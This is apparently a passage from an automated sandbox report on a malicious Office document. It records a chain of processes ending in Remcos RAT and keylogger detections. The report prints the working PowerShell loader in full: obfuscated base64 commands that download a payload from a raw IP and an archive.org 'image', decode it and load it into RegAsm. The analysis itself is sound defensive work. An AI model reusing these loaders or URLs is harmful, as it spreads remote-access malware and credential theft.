YWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"
                                                      Imagebase:0x13f030000
                                                      File size:443'392 bytes
                                                      MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:21
                                                      Start time:00:56:51
                                                      Start date:28/08/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.cmdline"
                                                      Imagebase:0x13f1b0000
                                                      File size:2'758'280 bytes
                                                      MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:22
                                                      Start time:00:56:51
                                                      Start date:28/08/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCDF9.tmp" "c:\Users\user\AppData\Local\Temp\mjo4tj0d\CSC1D7DFCB3A844EFFBAC81F2560943E20.TMP"
                                                      Imagebase:0x13fdf0000
                                                      File size:52'744 bytes
                                                      MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:24
                                                      Start time:00:56:57
                                                      Start date:28/08/2024
                                                      Path:C:\Windows\System32\wscript.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS"
                                                      Imagebase:0xffaf0000
                                                      File size:168'960 bytes
                                                      MD5 hash:045451FA238A75305CC26AC982472367
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:25
                                                      Start time:00:56:57
                                                      Start date:28/08/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?RQBO? ? ? ? ?EQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?E8? ? ? ? ?Zg? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?w? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?r? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C4? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?UwB1? ? ? ? ?GI? ? ? ? ?cwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?EM? ? ? ? ?bwBu? ? ? ? ?HY? ? ? ? ?ZQBy? ? ? ? ?HQ? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?RgBy? ? ? ? ?G8? ? ? ? ?bQBC? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FI? ? ? ? ?ZQBm? ? ? ? ?Gw? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?aQBv? ? ? ? ?G4? ? ? ? ?LgBB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?T? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?d? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?ZQBk? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQ? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?bgBs? ? ? ? ?Gk? ? ? ? ?Yg? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?Tw? ? ? ? ?u? ? ? ? ?Eg? ? ? ? ?bwBt? ? ? ? ?GU? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bt? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BN? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?VgBB? ? ? ? ?Ek? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?HY? ? ? ? ?bwBr? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?G4? ? ? ? ?dQBs? ? ? ? ?Gw? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?bwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?WwBd? ? ? ? ?F0? ? ? ? ?I? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?d? ? ? ? ?B4? ? ? ? ?HQ? ? ? ? ?LgBT? ? ? ? ?EQ? ? ? ? ?RQBS? ? ? ? ?C8? ? ? ? ?egBv? ? ? ? ?GI? ? ? ? ?LwBw? ? ? ? ?H? ? ? ? ?? ? ? ? ?bQBh? ? ? ? ?Hg? ? ? ? ?Lw? ? ? ? ?1? ? ? ? ?DU? ? ? ? ?MQ? ? ? ? ?u? ? ? ? ?DM? ? ? ? ?OQ? ? ? ? ?x? ? ? ? ?C4? ? ? ? ?Mw? ? ? ? ?u? ? ? ? ?DI? ? ? ? ?OQ? ? ? ? ?x? ? ? ? ?C8? ? ? ? ?Lw? ? ? ? ?6? ? ? ? ?H? ? ? ? ?? ? ? ? ?d? ? ? ? ?B0? ? ? ? ?Gg? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?UgBl? ? ? ? ?Gc? ? ? ? ?QQBz? ? ? ? ?G0? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ck? ? ? ? ?';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                      Imagebase:0x13f030000
                                                      File size:443'392 bytes
                                                      MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:27
                                                      Start time:00:56:58
                                                      Start date:28/08/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                                                      Imagebase:0x13f030000
                                                      File size:443'392 bytes
                                                      MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:28
                                                      Start time:00:57:03
                                                      Start date:28/08/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                      Imagebase:0x1170000
                                                      File size:64'704 bytes
                                                      MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000002.476275781.0000000000511000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                      Has exited:true

                                                      Disassembly

                                                      Code Analysis

                                                      Call Graph

                                                      • Entrypoint
                                                      • Decryption Function
                                                      • Executed
                                                      • Not Executed
                                                      • Show Help
                                                      callgraph 1 Error: Graph is empty

                                                      Module: Sheet1

                                                      Declaration
                                                      LineContent
                                                      1

                                                      Attribute VB_Name = "Sheet1"

                                                      2

                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                      3

                                                      Attribute VB_GlobalNameSpace = False

                                                      4

                                                      Attribute VB_Creatable = False

                                                      5

                                                      Attribute VB_PredeclaredId = True

                                                      6

                                                      Attribute VB_Exposed = True

                                                      7

                                                      Attribute VB_TemplateDerived = False

                                                      8

                                                      Attribute VB_Customizable = True

                                                      Module: Sheet2

                                                      Declaration
                                                      LineContent
                                                      1

                                                      Attribute VB_Name = "Sheet2"

                                                      2

                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                      3

                                                      Attribute VB_GlobalNameSpace = False

                                                      4

                                                      Attribute VB_Creatable = False

                                                      5

                                                      Attribute VB_PredeclaredId = True

                                                      6

                                                      Attribute VB_Exposed = True

                                                      7

                                                      Attribute VB_TemplateDerived = False

                                                      8

                                                      Attribute VB_Customizable = True

                                                      Module: Sheet3

                                                      Declaration
                                                      LineContent
                                                      1

                                                      Attribute VB_Name = "Sheet3"

                                                      2

                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                      3

                                                      Attribute VB_GlobalNameSpace = False

                                                      4

                                                      Attribute VB_Creatable = False

                                                      5

                                                      Attribute VB_PredeclaredId = True

                                                      6

                                                      Attribute VB_Exposed = True

                                                      7

                                                      Attribute VB_TemplateDerived = False

                                                      8

                                                      Attribute VB_Customizable = True

                                                      Module: ThisWorkbook

                                                      Declaration
                                                      LineContent
                                                      1

                                                      Attribute VB_Name = "ThisWorkbook"

                                                      2

                                                      Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                      3

                                                      Attribute VB_GlobalNameSpace = False

                                                      4

                                                      Attribute VB_Creatable = False

                                                      5

                                                      Attribute VB_PredeclaredId = True

                                                      6

                                                      Attribute VB_Exposed = True

                                                      7

                                                      Attribute VB_TemplateDerived = False

                                                      8

                                                      Attribute VB_Customizable = True

                                                      Reset < >

                                                        Executed Functions

                                                        Function 03750FC1 Relevance: .0, Instructions: 5COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000003.406020583.0000000003750000.00000010.00000800.00020000.00000000.sdmp, Offset: 03750000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_3_3750000_mshta.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                        • Instruction ID: 377030c2138ab9a35897f8319153199091d0001d61e4c591b97cf33f0a763eb9
                                                        • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                        • Instruction Fuzzy Hash:
                                                        Function 03750FB1 Relevance: .0, Instructions: 5COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000003.406020583.0000000003750000.00000010.00000800.00020000.00000000.sdmp, Offset: 03750000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_3_3750000_mshta.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                        • Instruction ID: 377030c2138ab9a35897f8319153199091d0001d61e4c591b97cf33f0a763eb9
                                                        • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                        • Instruction Fuzzy Hash:
